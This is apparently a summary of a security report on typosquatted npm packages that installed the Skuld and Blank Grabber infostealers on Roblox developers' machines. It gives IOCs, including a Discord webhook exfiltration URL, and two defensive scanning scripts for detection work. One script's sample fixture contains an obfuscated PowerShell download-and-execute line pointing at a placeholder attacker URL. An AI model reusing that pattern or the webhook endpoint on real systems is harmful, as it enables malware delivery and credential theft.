Roblox Developers Targeted by Infected npm Packages

Socket’s research team found five typosquatted npm packages that impersonated common Roblox developer modules and contained obfuscated JavaScript which downloaded and executed Skuld infostealer and Blank Grabber from a GitHub repository. The malicious installers used PowerShell to fetch and run binaries and exfiltrated stolen data via Discord webhooks and Telegram. #Skuld #BlankGrabber

Keypoints

  • Five malicious npm packages (node-dlls, ro.dll, autoadv, [email protected], [email protected]) were published to typosquat legitimate modules.
  • Packages contained highly obfuscated JavaScript that downloaded and executed external Windows binaries hosted on a GitHub repository.
  • Malware deployed included Skuld infostealer (Go) and Blank Grabber (Python), both designed to extract browser credentials, Discord tokens, and wallet data.
  • Download-and-execute flow used PowerShell commands (Invoke-WebRequest to save files and Start-Process to run them) enabling remote code execution.
  • Exfiltration occurred over Discord webhooks and Telegram; threat actor used public platforms for hosting and C2 to evade detection.
  • Over 320 downloads occurred before package removal, demonstrating supply chain risk via developer dependencies.
  • Mitigations include careful package name verification, code review of dependencies, and runtime/install-time scanners (e.g., Socket CLI/GitHub app).

MITRE Techniques

  • [T1195.002] Supply Chain Compromise – Threat actor injected malicious code into developer workflows by publishing typosquatted npm packages (‘The threat actor published typosquatted packages to deceive developers into installing Skuld infostealer and Blank Grabber malware.’)
  • [T1036.005] Masquerading (Match Legitimate Name or Location) – Malicious packages mimicked legitimate module names to trick developers into installing them (‘typosquatted the popular node-dll package — downloaded over 35,800 times — by publishing a deceptive variant named node-dlls.’)
  • [T1546.016] Event Triggered Execution (Installer Packages) – The npm package executed installer-like behavior by downloading and launching binaries via PowerShell during install/runtime (‘The function downloadAndRun was added to download the malicious executables and run them using PowerShell commands.’)
  • [T1555.003] Credentials from Password Stores (Web Browsers) – Deployed infostealer targeted Chromium/Firefox-based browsers to extract saved credentials and cookies (‘Skuld infostealer… targeting applications like Discord, Chromium and Firefox-based browsers, and cryptocurrency wallets.’)
  • [T1552.001] Unsecured Credentials (Credentials In Files) – Malware collected credentials and files from the host filesystem and stored artifacts for exfiltration (‘Blank Grabber is capable of extracting data like Discord tokens, browser passwords, cookies, cryptocurrency wallet details, as well as capture screenshots and webcam images.’)
  • [T1567.004] Exfiltration Over Web Service (Exfiltration Over Webhook) – Stolen data was sent to attacker-controlled channels using Discord webhooks and Telegram (‘The stolen data is then sent to the threat actor via Discord webhooks or Telegram.’)

Indicators of Compromise

  • [Malicious npm packages] Typosquatted packages used to deliver malware – [email protected], [email protected], and 3 more packages
  • [Malicious URLs] Hosted payloads on GitHub raw URLs – hxxps://github[.]com/zvydev/code/raw/main/RobloxPlayerLauncher.exe, hxxps://github[.]com/zvydev/code/raw/main/cmd.exe, and the repository hxxps://github[.]com/zvydev/code
  • [C2 / Exfiltration] Communication endpoints used to receive stolen data – hxxps://discord[.]com/api/webhooks/1298438839865577564/LcdRm0rKPE01ApFPl9RQHGqhcuExeiqKGpghrB8Lv3iKniiyEa0mVBhFySte_oBx7wyQ
  • [File hashes] Payload SHA256 hashes for detection/blocking – RobloxPlayerLauncher.exe: 9d60a15cf6779912cc49ce36597b2264f97071c4afc61c370454931083df2e3f, cmd.exe: b3ce55c72f4e23252235f9698bd6078880ceaca310ba16ee859a5a2d6cc39a9

The compromise began with typosquatted npm packages that impersonated legitimate Roblox developer modules (for example node-dlls in place of the legitimate node-dll). Each package carried heavily obfuscated JavaScript that defined URLs pointing to Windows executables hosted in an attacker-controlled GitHub repository. At install time or when the module was loaded, the package called a download-and-execute routine that used PowerShell Invoke-WebRequest to save the binary and Start-Process (or an equivalent exec call) to launch it, giving the attacker code execution on the developer's machine with no interaction beyond installing the dependency.
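As an added example (not code from the Socket write-up or from the malicious packages), the Node.js script below triages an unpacked npm package for the chain just described: an install-time lifecycle hook, PowerShell fetch-and-run strings, a raw GitHub payload URL, and obfuscation that hides the child_process call. The sample package contents, the placeholder GitHub URL and the helper names are constructed for illustration.

```javascript
// Added example: static triage of an unpacked npm package for the
// "obfuscated JS + PowerShell download-and-execute" pattern. Not code from the
// Socket report or the malicious packages; sample inputs below are constructed.

// String-level signals. The ids are this example's own.
const SIGNALS = [
  { id: "ps-download", re: /Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString/i },
  { id: "ps-execute", re: /Start-Process|Invoke-Expression|\biex\b/i },
  { id: "child-proc", re: /child_process|\bexec(?:Sync)?\s*\(|\bspawn(?:Sync)?\s*\(/ },
  { id: "raw-github", re: /github\.com\/[^\s'"]+\/raw\/|raw\.githubusercontent\.com/i },
  { id: "exe-payload", re: /\.exe\b/i },
  { id: "webhook-exfil", re: /discord(?:app)?\.com\/api\/webhooks|api\.telegram\.org\/bot/i },
];

// Obfuscation heuristics: long runs of hex/unicode escapes, javascript-obfuscator
// style identifiers (_0x1a2b), very long base64-looking literals, eval/Function.
function obfuscationScore(src) {
  let score = 0;
  if (/(?:\\x[0-9a-f]{2}){8,}/i.test(src)) score += 2;
  if (/(?:\\u[0-9a-f]{4}){8,}/i.test(src)) score += 2;
  if (/_0x[0-9a-f]{4,}/.test(src)) score += 2;
  if (/['"][A-Za-z0-9+/=]{200,}['"]/.test(src)) score += 2;
  if (/\b(?:eval|Function)\s*\(/.test(src)) score += 1;
  return score;
}

// files: { relativePath: contents } for one unpacked package.
function scanPackage(files) {
  const findings = [];
  const pkg = files["package.json"] ? JSON.parse(files["package.json"]) : {};
  // Lifecycle hooks run automatically on `npm install` unless --ignore-scripts is set.
  for (const hook of ["preinstall", "install", "postinstall", "prepare"]) {
    if (pkg.scripts && pkg.scripts[hook]) {
      findings.push({ file: "package.json", id: `lifecycle-${hook}`, detail: pkg.scripts[hook] });
    }
  }
  for (const [path, src] of Object.entries(files)) {
    if (!/\.(?:c|m)?js$/.test(path)) continue;
    for (const { id, re } of SIGNALS) {
      const m = src.match(re);
      if (m) findings.push({ file: path, id, detail: m[0] });
    }
    const score = obfuscationScore(src);
    if (score >= 3) findings.push({ file: path, id: "obfuscation", detail: `score=${score}` });
  }
  return findings;
}

// Fetch + execute together, plus an install hook or obfuscation, is the full chain
// from the report and should block the install; any single signal earns a review.
function verdict(findings) {
  const ids = new Set(findings.map((f) => f.id));
  const fetch = ids.has("ps-download") || ids.has("raw-github");
  const run = ids.has("ps-execute") || ids.has("child-proc");
  const hook = [...ids].some((i) => i.startsWith("lifecycle-"));
  if (fetch && run && (hook || ids.has("obfuscation"))) return "block";
  if (fetch || run || hook || ids.has("obfuscation")) return "review";
  return "pass";
}

// Constructed sample: a package shaped like the reported one. The GitHub URL is a
// placeholder, and 'child_process' is spelled out in hex escapes so a plain
// string match for it fails, which is what the obfuscation heuristics cover.
const SAMPLE_MALICIOUS = {
  "package.json": JSON.stringify({
    name: "node-dlls",
    version: "1.0.0",
    scripts: { postinstall: "node index.js" },
  }),
  "index.js": [
    "var _0x4a2b=['\\x63\\x68\\x69\\x6c\\x64\\x5f\\x70\\x72\\x6f\\x63\\x65\\x73\\x73','exec'];",
    "var u='https://github.com/attacker-placeholder/code/raw/main/payload.exe';",
    "function downloadAndRun(){",
    "  require(_0x4a2b[0])[_0x4a2b[1]](\"powershell -Command \\\"Invoke-WebRequest -Uri '\" + u + \"' -OutFile $env:TEMP\\\\p.exe; Start-Process $env:TEMP\\\\p.exe\\\"\");",
    "}",
    "downloadAndRun();",
  ].join("\n"),
};

// Constructed benign sample: no hooks, no fetch/exec strings.
const SAMPLE_BENIGN = {
  "package.json": JSON.stringify({ name: "node-dll", version: "1.2.0" }),
  "index.js": "module.exports = { loadLibrary: (path) => ({ path, loaded: true }) };",
};

if (typeof require !== "undefined" && require.main === module) {
  for (const [label, files] of [["constructed malicious", SAMPLE_MALICIOUS], ["constructed benign", SAMPLE_BENIGN]]) {
    const f = scanPackage(files);
    console.log(label, "->", verdict(f), JSON.stringify(f));
  }
}
```

Run against a directory produced by `npm pack` and `tar -xzf` before the package is installed. Note that the hex-escaped require defeats the child-proc string signal entirely; the verdict still reaches "block" because the fetch and execute strings, the postinstall hook and the obfuscation score are caught independently, which is why the signals are combined rather than relied on one at a time.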

Once executed, the downloaded binaries deployed commodity infostealers: Skuld (Go) and Blank Grabber (Python). Skuld targets browsers (Chromium/Firefox families), Discord, and crypto wallets to harvest credentials, cookies, and wallet data, and includes anti-debugging, AV disablement, and privilege escalation techniques. Blank Grabber offers configurable behaviors (disabling Defender, UAC bypasses, screenshot/webcam capture) and similarly extracts tokens, passwords, and other sensitive artifacts. Both families exfiltrated collected data to attacker channels via Discord webhooks and Telegram, leveraging trusted services to blend with legitimate traffic.

Detection and mitigation focus on keeping malicious packages out of the build and runtime environment: check exact package names against the intended upstream (node-dll, not node-dlls) and verify the publisher or provenance where it is available; review third-party package code, looking for obfuscation and for exec or PowerShell download patterns; block the listed URLs and hashes; and use dependency-time scanners that analyse packages before they are written to disk (for example, Socket's CLI and GitHub app, which scan npm installs and pull requests). Installing with npm's --ignore-scripts option (or ignore-scripts=true in .npmrc) stops lifecycle hooks from running at install time but not code that executes when the module is later required, so it is a partial control. Runtime protections should restrict PowerShell and outbound network access from build and install contexts and alert on connections to discord.com/api/webhooks and api.telegram.org from developer and CI hosts.
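The name-verification step above can be automated. As an added example (not Socket's code), the script below audits a package.json dependency list against a team-maintained allowlist and against the package names from the IOC list, flagging names within one or two edits of an approved package. Only node-dll comes from the report; the other allowlist entries and the sample package.json are constructed.

```javascript
// Added example: typosquat check for a dependency list. Not from the Socket report;
// the allowlist beyond node-dll and the sample package.json are constructed.

// Optimal string alignment distance: insert, delete, substitute, plus adjacent
// transposition, so "lodsah" vs "lodash" scores 1, as does "node-dlls" vs "node-dll".
function osaDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Allowlist: node-dll is the legitimate package named in the report; the rest are
// constructed stand-ins for whatever a team actually approves.
const KNOWN_GOOD = ["node-dll", "lodash", "express"];
// Package names from the report's IOC list (the two version-suffixed names were
// not recoverable from the page and are omitted).
const KNOWN_MALICIOUS = ["node-dlls", "ro.dll", "autoadv"];

// deps: the "dependencies" object of a package.json. Returns one finding per hit;
// a name can be both on the blocklist and an edit away from an approved package.
function auditDependencies(deps, knownGood = KNOWN_GOOD, knownBad = KNOWN_MALICIOUS) {
  const findings = [];
  for (const rawName of Object.keys(deps)) {
    const name = rawName.toLowerCase();
    if (knownBad.includes(name)) findings.push({ name: rawName, reason: "known-malicious" });
    if (knownGood.includes(name)) continue; // exact match to an approved package
    // Allow two edits only for longer names; one edit on a short name is already suspicious.
    const maxDist = name.length >= 8 ? 2 : 1;
    for (const good of knownGood) {
      const dist = osaDistance(name, good.toLowerCase());
      if (dist > 0 && dist <= maxDist) {
        findings.push({ name: rawName, reason: "typosquat", target: good, distance: dist });
      }
    }
  }
  return findings;
}

// Constructed sample dependency list: one IOC name, one transposition, one clean entry.
const SAMPLE_PACKAGE_JSON = {
  dependencies: { "node-dlls": "1.0.0", lodsah: "^4.17.21", express: "^4.18.2" },
};

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(auditDependencies(SAMPLE_PACKAGE_JSON.dependencies), null, 2));
}
```

Wire this into CI against the lockfile rather than package.json alone so transitive dependencies are covered too; the distance threshold is deliberately conservative, and an exact match on the allowlist short-circuits the check so approved packages never flag each other.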

Read more: https://socket.dev/blog/roblox-developers-targeted-with-npm-packages-infected-with-infostealers